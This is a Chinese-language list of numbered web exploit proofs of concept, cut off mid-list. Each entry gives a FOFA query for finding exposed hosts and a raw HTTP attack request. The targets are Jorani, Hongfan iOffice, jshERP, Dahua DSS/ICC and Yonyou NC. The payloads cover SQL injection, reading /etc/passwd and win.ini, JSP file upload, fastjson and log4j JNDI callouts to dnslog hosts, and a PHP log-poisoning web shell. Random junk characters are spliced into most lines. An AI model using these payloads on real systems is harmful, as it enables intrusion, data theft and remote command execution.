- G5 H$ ]3 \2 Z" y' G& fGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
- v( s$ R8 h$ z( yHost: 127.0.0.1
6 c* l8 a4 I2 CPragma: no-cache  r! M2 q1 |: t* W7 ~9 b3 ]" I
Cache-Control: no-cache
0 x. M  i4 r/ z! \Upgrade-Insecure-Requests: 1' j( p. \4 w, f  [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 R: _# ^! f& g" R; R# \' aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" `. h) _8 G. Q4 c+ {
Accept-Encoding: gzip, deflate2 T# v/ ~+ Y$ m: _, Q: [& }" x
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8& |! W  b4 h9 c
Connection: close4 `. M% P! h! T$ a- T' I
% T& w/ N; l3 W: _$ T) S6 e
7 Q* J3 x6 {) h
12. Jorani < 1.0.2 远程命令执行
/ _: ?4 k' a9 v4 o% O( RFOFA：title="Jorani"
: ]/ A& b3 y% p5 r% w6 ?第一步先拿到cookie
4 G7 p, V$ L6 s8 q3 vGET /session/login HTTP/1.12 h& s# g9 z& d  K4 k4 y4 }9 n
Host: 192.168.190.304 h- y2 D8 }4 o9 E. C
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
; Q3 u: q7 C* p  i9 pConnection: close
. `" @; R6 L* s$ E0 t/ H. bAccept-Encoding: gzip
7 P) t3 [- L1 Y9 v) q
6 W5 }2 b4 |" `4 M" Y1 D) p1 [  ]; g
响应中csrf_cookie_jorani用于后续请求9 Z8 G4 H3 h6 K' e* z& l' b# }/ B, D( j! S
HTTP/1.1 200 OK3 f4 w& q/ \: x7 E
Connection: close: v1 `" x; D8 f+ t* I! ?  q' y
Cache-Control: no-store, no-cache, must-revalidate% M. ^5 \4 F- l+ V4 r* S
Content-Type: text/html; charset=UTF-8: H# m6 Y, A9 n0 y. t4 n$ h
Date: Tue, 24 Oct 2023 09:34:28 GMT
8 G  D- i1 F5 k$ K  DExpires: Thu, 19 Nov 1981 08:52:00 GMT
( P4 [' J2 r0 u8 v8 B* zLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT( l, `0 o- P# N
Pragma: no-cache
* h+ I& |. G4 w2 D0 AServer: Apache/2.4.54 (Debian)+ H$ m0 B# R6 h! i
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
8 \" i4 Y; o( I( k1 C- nSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
8 G+ m# {/ W5 R+ z, J) \Vary: Accept-Encoding
& N, F0 O! I) O# ?& h/ `
/ ]5 o* U& B+ M3 V' {- c/ E# S; Z, |" q/ @: ]
POST请求，执行函数并进行base64编码
' B5 p, |2 D+ n: a3 f5 z9 qPOST /session/login HTTP/1.1" t* c4 U! Z6 n5 Q% `4 a
Host: 192.168.190.30* f% Q+ U1 C7 ^, a& q  n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36/ L* J* P) \: ]
Connection: close7 ?+ _& A$ t* g1 {. J9 f; T" U
Content-Length: 252' v4 I& h' V/ x# t+ ^2 v
Content-Type: application/x-www-form-urlencoded  ]) L) m) k. [
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
$ [* R) h7 p! JAccept-Encoding: gzip
9 e* m  o, Y- Q/ n0 ]
; m2 K- {' [; R  _+ {' E1 v+ acsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor& _$ S) R9 l; ~+ H  d3 Q# ^' d
- m4 j3 P9 i, k# w
0 k2 P1 g9 U2 l0 p" y/ o, Q

- B$ d6 c1 [: O% b3 z; Y8 [向靶场发送如下请求，执行id命令，请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串( X8 l6 P) }2 ?& z& ]% Q1 V% Z0 N
GET /pages/view/log-2023-10-24 HTTP/1.1
. ]' L+ g$ U+ g- YHost: 192.168.190.302 ?* ]6 T& ~7 h  s! _; i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36) T( c+ ]1 H0 j2 J/ H% `& c
Connection: close. I7 ^4 e3 D% W
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
9 \* a8 e, J' O% q& B4 K. TK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
2 a7 B0 p+ m! y+ A4 @0 Z  uX-REQUESTED-WITH: XMLHttpRequest( z- [0 _+ _) c" _! d, w% W
Accept-Encoding: gzip- o# H& b$ K+ S  w! z' ?- ?& N1 o" |
5 k+ `1 n( f+ n/ e  [
3 m. b9 z4 a+ ]% {% J9 I
13. 红帆iOffice ioFileDown任意文件读取% r+ b- W2 y% n9 C: e2 j6 M$ `# e' q
FOFA：app="红帆-ioffice"
4 E3 p2 L3 S. q; _GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1: q" p$ B* H9 R) p
Host: x.x.x.x
7 i1 s, b5 j% B/ x. ]/ T$ oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
9 c2 H6 W* d1 PConnection: close' W: e7 s1 r# o/ o& t
Accept: */*
- E% Q! r' x' c# E* v$ g8 KAccept-Encoding: gzip
2 [5 U9 p$ J# E8 }& G
# x/ \. k# e2 M. T1 o: L+ i, T/ Q1 `. ^' c% @' t3 p
14. 华夏ERP（jshERP）敏感信息泄露: c0 |6 y  `1 v# }
FOFA：body="jshERP-boot"
$ G4 `$ X3 |. m" }. I泄露内容包括用户名密码8 P; ^2 L) e) ^
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1# u) k" C* g. n
Host: x.x.x.x* [7 d2 P& D4 b2 K4 O3 E. |( \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36. d1 J0 J+ m' Q, x' k  K6 u
Connection: close3 r) ?, ?* C" I' i
Accept: */*
( z$ v" o7 J. H0 C; G0 XAccept-Language: en
$ Z& H. k4 \! |4 R7 p  @" oAccept-Encoding: gzip& ^# ?' Z0 ]3 p% B

" x1 x! S' k8 p- @7 r
" p# y  F0 u% K, P: p) ^% z15. 华夏ERP getAllList信息泄露! L! ~5 D0 t- ?# [% |' u; s
CVE-2024-0490. p2 l0 G/ U, P# y( V
FOFA：body="jshERP-boot"
8 m5 K' J* z' U泄露内容包括用户名密码
! ?! D' o/ n& ~. _& c) n( vGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
0 n! C2 N! Y% ~3 n$ m; R& v: [Host: 192.168.40.130:100
; o) z) \/ b; P& |' D& v" T5 QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.369 {2 c6 m7 L9 d" `# L& M
Connection: close
( y3 w  n5 r) j# C6 ^Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8- N! D8 n+ N3 I4 }! c! U9 e
Accept-Language: en
7 I  @( T8 ?+ T0 N: Z8 ysec-ch-ua-platform: Windows# W2 M# ?8 y2 p* c2 S5 `4 F& {) U
Accept-Encoding: gzip
! G) l7 r7 C  _( ~6 P( y
( j" _8 T; j! O+ }. @* o3 U! _' J$ h0 y- F9 u3 L9 P
16.  红帆HFOffice医微云SQL注入
2 Z6 o9 K! N* }+ H& N: \, g& JFOFA：title="HFOffice"
& L) d6 }1 x* U# l3 npoc中调用函数计算1234的md5值! i4 ~0 T- k+ U" B) D
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
+ a  O! s" ]1 }2 i3 c( c. OHost: x.x.x.x
9 [# D, R1 Z, w' K0 ], Z2 @3 KUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
; z' h. n! M% D4 E' [Connection: close
% y3 `# D8 H! ~Accept: */*, K7 O+ l' V; o/ s( ~
Accept-Language: en1 o: c0 F  {6 y
Accept-Encoding: gzip3 I1 b" k! o) F6 o  k$ h) D

( Q( X* f4 R6 O# F" C/ K; f0 j
' J& n4 Z- ^! Q) r17. 大华 DSS itcBulletin SQL 注入# \( ]/ @( I( Y+ |$ f. T
FOFA：app="dahua-DSS"
) @. B& |7 Z7 W7 qPOST /portal/services/itcBulletin?wsdl HTTP/1.1
1 c7 u- ?: S* G! DHost: x.x.x.x
; c3 X) E# C* R5 D' T! E+ vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ H( i7 o" b4 q. E( \% E% v0 f( t
Connection: close. h4 y1 }, @1 a- U* p  s: l1 ^. r- ^
Content-Length: 3450 J* B  l$ Z+ @
Accept-Encoding: gzip
( B, n0 }: X4 @' W& J- r8 d8 E; z  G9 T; s
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
; r+ R: f4 ?" w& M. U( Q5 I<s11:Body>
4 ?+ ]0 ^; F& Y <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
+ q' L& R  p  {% ?& Q    <netMarkings>
" J0 f) k, @4 ~' c0 Z. a    (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=12 Z/ L, _; q) b3 c
   </netMarkings>
  `2 `# V) }' B  G, P6 T: q. ^ </ns1:deleteBulletin>
% L4 z  p3 g  r" W* @. G  </s11:Body>
  T- Y! A* j* h$ o* S</s11:Envelope>
" n& g: K8 D" c4 `) t9 w/ o, a; c( P9 W
5 K9 D3 E3 g& g0 r0 @4 H5 a! W
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露' F5 r' U, @8 M9 N
FOFA：app="dahua-DSS"
% }7 j  V" k, {- tGET /admin/cascade_/user_edit.action?id=1 HTTP/1.16 x) |7 c, m8 b! q; N7 ~/ }
Host: your-ip
& l. d3 d  @- Y0 @# B  ]: d! x6 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- }: K6 c& m% n/ T5 QAccept-Encoding: gzip, deflate
+ Y9 H- C% y7 K* U2 ~6 _) TAccept: */*
* @/ y% {! p9 i5 M" _Connection: keep-alive
, i. _7 |2 A( R6 M5 y# S. r" P. t+ u+ D6 S1 z2 {

3 x& I, t: N/ f. A6 \8 l: ?2 M. V& m8 o  o& }3 W" O7 p
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
+ h$ @: D0 y' s7 V7 SFOFA：app="dahua-DSS"
0 G/ _' @6 {2 \) ?GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
0 U/ x- H' w. O" BHost:+ ~% @  r& l: B' P$ x& b4 y3 x7 A
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
$ U; k" N5 y( F. e+ r2 E2 ]( Q) U7 zAccept-Encoding: gzip, deflate
! L+ N3 B8 Z4 S/ J. _- L  dAccept: */*" x; v& D& O3 F% g: g
Connection: keep-alive/ A9 Z6 I  Q1 y  k
# i, W" e. V# o% P) X9 `3 H

* H/ L) R0 _9 l$ X) K20. 大华ICC智能物联综合管理平台任意文件读取, w3 y: Q$ a; H; G
FOFA：body="*客户端会小于800*"
" R: x% }; W0 M4 S/ }GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.10 F* B" H" l! e9 w  q' H8 B
Host: x.x.x.x
4 l2 N6 P5 U( _2 D: J' MUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( Y. H' p0 P, \+ z4 kConnection: close- K2 G+ v, D7 K; `
Accept: */*2 I) z5 O: K: ^" q8 W' u) v
Accept-Language: en
" q# u' N: @. Y! K+ h" T; M+ YAccept-Encoding: gzip
% [0 i; b1 C9 o) Y7 |/ Y4 ]+ f1 k/ [' X4 s/ ]* K
9 u, I/ Z8 R. g6 Y/ N/ t9 z6 T
21. 大华ICC智能物联综合管理平台random远程代码执行
/ H% f! C! |, N- f; ]/ pFOFA：icon_hash="-1935899595"  a- W; ?& j7 _% B1 i
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
0 G' L4 g/ y- iHost: x.x.x.x" w7 r9 O0 z( Q. ?4 k! l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' M; q+ |* I5 \  }/ QContent-Length: 161
  G0 G3 G, l! }8 N. r. Y1 O8 q( JAccept-Encoding: gzip
6 N; E7 o; U; @+ P) g8 DConnection: close
8 h0 `& r$ Y6 u# _Content-Type: application/json;charset=utf-82 V/ h2 k4 w+ f2 {
# W5 H8 L* B: a& N9 i  j
{
"a":{% M# v8 [# U+ ?7 j, x2 p, C) q
"@type":"com.alibaba.fastjson.JSONObject",9 A# t4 `  c, U+ E5 j
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
0 e& ^) x  k# Z) U( ~  }""
! [4 }6 j: e8 m7 f$ z( O}
5 _; [/ j7 Y' h: |
4 h- Z& S9 ], S% M, B1 S+ w: d; B) I3 L( R- u) J
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
' w' B$ \+ w0 mFOFA：icon_hash="-1935899595"
5 R1 k9 L" ^7 h. z# i/ U) _POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
; s' ^5 Y  s% YHost: your-ip+ F& ^( J& ?1 G7 }. k3 I" e( u9 O  v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, G: ?( E6 b" H5 ^( Y0 O
Content-Type: application/json;charset=utf-81 a. ~% k) L! r& s& D
' _) @" @4 _$ v  S1 G4 A4 h
{( {4 p7 N8 N0 D) P1 ]) Q2 W0 J8 N3 d
"loginName":"${jndi:ldap://dnslog}"
% s9 ?3 P" A* m# j- q: |8 Q}
! G( w9 d1 h$ d# d* f5 x
8 X( M4 Z  k; F  g/ B( D* V8 P' h. G  d; ]! c. }8 h
7 ?* M$ ?3 ~6 x) \" w
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
+ U: N% r% i% FFOFA：icon_hash="-1935899595"
6 v2 F% ^$ e$ S! p0 |0 O4 jPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
: D5 d% O* {$ Q* BHost: your-ip
6 F0 l- d7 [& l  L8 l2 e) ^' KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ P7 U7 O/ H0 L) f! t* t& A
Content-Type: application/json;charset=utf-8- w! |5 T4 _) l* y, a4 x1 M  ~
Accept-Encoding: gzip* o+ d# Q1 H9 U, @. d
Connection: close
8 k& o7 D, }$ v7 J& z! @/ D" B9 k4 s$ v. y0 W
{, T3 ]9 ^8 D; P
"a":{9 U3 T; [8 k4 t1 M/ B1 Z  D
      "@type":"com.alibaba.fastjson.JSONObject",, Z  @9 j6 [# I! W, P) @- T( Q% ^- A! V
   {"@type":"java.net.URL","val":"http://DNSLOG"}7 @8 p$ N9 U0 b" T, N( j- E
      }""
$ ~  W4 O5 i% @) b3 y}
5 ?- e, X( ~/ u) f' t- ~# K' ^4 F. [; b$ O( x$ x  F

9 |6 L! @, H4 J0 W) M9 R9 `24. 用友NC 6.5 accept.jsp任意文件上传9 ~4 Z2 h* k% y( P8 ^% Y
FOFA：icon_hash="1085941792"- g. u! d6 l- W3 p4 X
POST /aim/equipmap/accept.jsp HTTP/1.1- \  Y& @7 G8 J
Host: x.x.x.x
7 \6 z+ G) _9 f. m- TUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
! F# e/ G/ }/ D. T% TConnection: close, C9 r, v) E! U. R. ?5 y6 ]
Content-Length: 4490 C$ Q: y" n, @
Accept: */*. j# `4 Y. ~+ G! H2 Y8 z1 s
Accept-Encoding: gzip4 b2 V# o- M' Y9 W2 Y$ y0 J# L
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
, B$ _7 A4 r, j6 S9 U- J" @. X9 D  p7 ?% \
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
/ e/ o' R( d; D' q; d  v+ ^Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
8 L- S. X. w( x& M3 @Content-Type: text/plain6 j% J9 t1 [9 K  ]) M6 ^
  r! d; c; Z, B( M
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>3 E* M' F( }- Q
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
; e! O* ~5 e  u2 l( \2 NContent-Disposition: form-data; name="fname") h9 e8 @8 |1 k0 y/ G; S

( b+ O* o; }, Y\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
; H: T+ t( o5 Q1 d6 M3 m-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--2 A$ g% E/ U  n) l- d! z+ ?

/ l8 ^" A9 L/ D; u- L  }, ]1 |% C; B7 B" }+ u& Q
25. 用友NC registerServlet JNDI 远程代码执行
( c/ k' a2 q6 HFOFA：app="用友-UFIDA-NC"( O: v8 F2 p! \$ L) t
POST /portal/registerServlet HTTP/1.1
6 d' a+ t% Y( K2 C: j& J7 WHost: your-ip
- F( D( r% M7 e  ?! C3 k4 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
8 g" C1 P4 J+ O4 U8 @/ mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.98 u1 d3 }; }7 m
Accept-Encoding: gzip, deflate
# }- f3 D! q. g$ fAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6$ e2 K( d. u+ R  ~$ M0 J
Content-Type: application/x-www-form-urlencoded
/ U  b1 G  |- h( D
9 T9 v) ?; f3 }2 ztype=1&dsname=ldap://dnslog
" A  J8 t( J+ J3 R
% ~1 @+ _: s* M0 ^- ?! B# q1 I+ Q# W7 v+ N: W- `

$ A' y. K$ V4 a8 L# }7 w0 M6 P26. 用友NC linkVoucher SQL注入; t9 X. o1 X; W  ^
FOFA：app="用友-UFIDA-NC"0 D, o* l% R9 I, H; q, M( s
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
2 a5 e  g- B! Z+ tHost: your-ip
/ A8 B# v7 O4 T9 |( @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 z8 ?& u9 ^& r: Y0 r8 D0 EContent-Type: application/x-www-form-urlencoded: K# U' J9 ~& x$ a2 x
Accept-Encoding: gzip, deflate
( Y+ `" d" T4 x, y: {Accept: */*
& Z0 c! v, w& [7 Y3 k' f* tConnection: keep-alive. o; d# I* O$ O1 L% {
; r& k/ M8 _2 J! u7 u9 e
, `( L8 B: y$ M  a
27. 用友 NC showcontent SQL注入" _# f% r1 I, R" Q$ i9 N
FOFA：icon_hash="1085941792"
  w0 _7 I9 r) Q- `# DGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
' l4 T3 I" X( @5 `2 _7 S3 LHost: your-ip
! h( g5 E2 g( D2 u5 M7 V. vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 P1 A0 a( a1 ]& JAccept-Encoding: identity, }1 X6 n+ q% m! w! d' ?* g
Connection: close
) S  p! u5 n' B  Q: TContent-Type: text/xml; charset=utf-8
8 c9 o; Q: j* E6 r( i. Z" j! P2 z. o$ ~9 `% j1 m8 G6 @8 r
+ u3 @4 M1 |  c! Q
28. 用友NC grouptemplet 任意文件上传
' m! h7 v6 x3 n( J# ^+ pFOFA：icon_hash="1085941792"7 i$ i; n; D' z, A- z3 T4 ~
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1* C5 k+ ?/ l. r( o
Host: x.x.x.x7 u) m" ]# z4 M; g8 N( n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
7 b/ ^* j/ w3 `/ {3 ^, {# AConnection: close
& X! d1 ~+ \+ lContent-Length: 268
* A1 M% f$ f% G) P, b6 h+ M( ZContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk, E( Z8 t% Z# `( M+ j8 ~' ^# _
Accept-Encoding: gzip4 r9 j! E+ Y* x8 o# J2 F' ~

& H4 q+ n9 t5 i6 W  s0 r( c+ S------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk( _( A2 m1 ]* l' Y# W% ]
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
' p) O/ U% D. ^5 }Content-Type: application/octet-stream
. [; I7 D& I6 d% ], E+ H/ ^4 P0 }7 d! i1 }# _. G) K: g$ G5 V
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>% w5 s! f3 M: G1 Q0 ?4 _
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
5 F8 A. D4 ~& a- v- F- T: ^; \6 _. F
, }% v+ @3 b8 c  c# X2 V4 e0 M# I! m1 p5 I. t0 S1 a- x
/uapim/static/pages/nc/head.jsp# a  V2 b' g8 a, m# ^

& w# b( J1 L. I7 Z29. 用友NC down/bill SQL注入& ]. T0 t) b- ]! O  r, O* N
FOFA：icon_hash="1085941792" && body="/logo/images/logo.gif"
; w$ ^% O. V2 S: QGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1# v2 Q, G; u! r, x9 N, D6 M6 h
Host: your-ip
: T+ q" d- q- f* }  YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 m; a' X7 s  q( E+ \2 a% s" ?Content-Type: application/x-www-form-urlencoded
# }/ {7 X" l5 yAccept-Encoding: gzip, deflate
& \8 U* B, g) G; VAccept: */*) \# _' U( K0 I- L# R) N0 @
Connection: keep-alive  Z8 U- I+ g! }( X) ]2 [: E) F9 b

+ R0 m. u2 {) O5 M9 K9 J3 m. m& z1 w- G3 C0 [* {
30. 用友NC importPml SQL注入# m! L+ W( o  v9 `2 G& y
FOFA：icon_hash="1085941792" && body="/logo/images/logo.gif"8 p  a- S7 d! n: x) {2 m
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.12 n! J' a2 j: z+ O; q
Host: your-ip8 U% C  c3 T( Y! d4 |* d! F) K' v
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
/ X! _! k+ N+ Z7 o. ^3 @# AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36  S0 p- O0 [9 S5 t* X- R) w$ J
Connection: close- _' p) G. f& h; K3 t; v
& V9 S- F& g8 N% Z( D8 B3 M
------WebKitFormBoundaryH970hbttBhoCyj9V
* a5 c* k# ^/ x* s* HContent-Disposition: form-data; name="Filedata"; filename="1.jpg"5 [, x6 ~6 D# }
Content-Type: image/jpeg2 x5 }# b3 y, U5 i# _0 U
------WebKitFormBoundaryH970hbttBhoCyj9V--
3 e" q: S# H) x. z! `
2 ^: ~% s: v- W2 D" d( R
# w! F- q6 s0 D( I/ r* G! v31. 用友NC runStateServlet SQL注入# W" u  l, S& y8 \) x1 u$ W9 ]  |
version<=6.5
! G' ]2 M" m3 D6 V% nFOFA：icon_hash="1085941792" && body="/logo/images/logo.gif"* ^* L# r3 M: V9 c1 b
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
9 v% B: ^# p& y# JHost: host. q1 C5 ]' G' N! p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
! Y4 Q' X4 K9 \' Z' T" ]: B$ iContent-Type: application/x-www-form-urlencoded' K3 S8 N# s* C  c3 l, w4 F4 t) r

6 q" z! h0 k0 ~% T# Q7 _, Y* w% Y5 T+ d0 j7 K- o
32. 用友NC complainbilldetail SQL注入
# I+ f% b, e5 T: L  ]4 I# Fversion= NC633、NC654 z' V) F7 t( R' P" Y" G. E
FOFA：app="用友-UFIDA-NC"& e( y. x, E' g) i" b) t+ B+ u. D/ B
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.13 b: V' R' L9 J3 f* L$ x
Host: your-ip
7 S4 ?1 P4 |: yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" H  V# v4 M0 g. j6 d+ W7 UContent-Type: application/x-www-form-urlencoded
" w2 N  w. f8 e- W* x: K9 yAccept-Encoding: gzip, deflate
8 r- o  o  i9 ^1 \8 zAccept: */*
0 k& l8 c! t# i* u7 YConnection: keep-alive# k9 q+ }1 d" R% P( \
. t' o; p! E) n) ~0 V

* o, c1 Y, L1 E, B33. 用友NC downTax/download SQL注入! K% B' B8 @0 S6 A2 h; X
version：NC6.5FOFA：app="用友-UFIDA-NC"
  h" |8 E7 B8 s# QGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.12 u% I5 Z7 q1 V! t
Host: your-ip% Q) u( H+ W+ H2 l3 x  b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 R6 R2 B  Q; i$ S/ B( x& n; f% d! n& V
Content-Type: application/x-www-form-urlencoded1 R, {. F  ^/ l$ t' q% X
Accept-Encoding: gzip, deflate
  i3 b! v6 o- fAccept: */*, _8 {- Q+ d; m
Connection: keep-alive; g9 `1 b2 ~5 H! P& `( [: W
8 d) m  ^7 K6 R" J/ y. \0 |

) U/ m. H! \0 S% k34. 用友NC warningDetailInfo接口SQL注入
' G- W# ?- r6 p$ f4 t* HFOFA：app="用友-UFIDA-NC"
5 I. p3 p/ }2 Q9 q4 dGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1$ G6 Q# l7 L0 V' }% M5 k
Host: your-ip' P0 y# b+ f5 g! s6 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 R0 R% t) |  {* ?* u( pContent-Type: application/x-www-form-urlencoded
, ~! l- l3 Q# V" t0 JAccept-Encoding: gzip, deflate: x8 v" A# A3 w
Accept: */*
& _0 L! s0 K2 P* Q1 {7 m, a9 gConnection: keep-alive
( j! D+ ^5 y( t- B
) r% F# x  }( a. W
& s" c, \" F, G% F" q" c& T  J35. 用友NC-Cloud importhttpscer任意文件上传
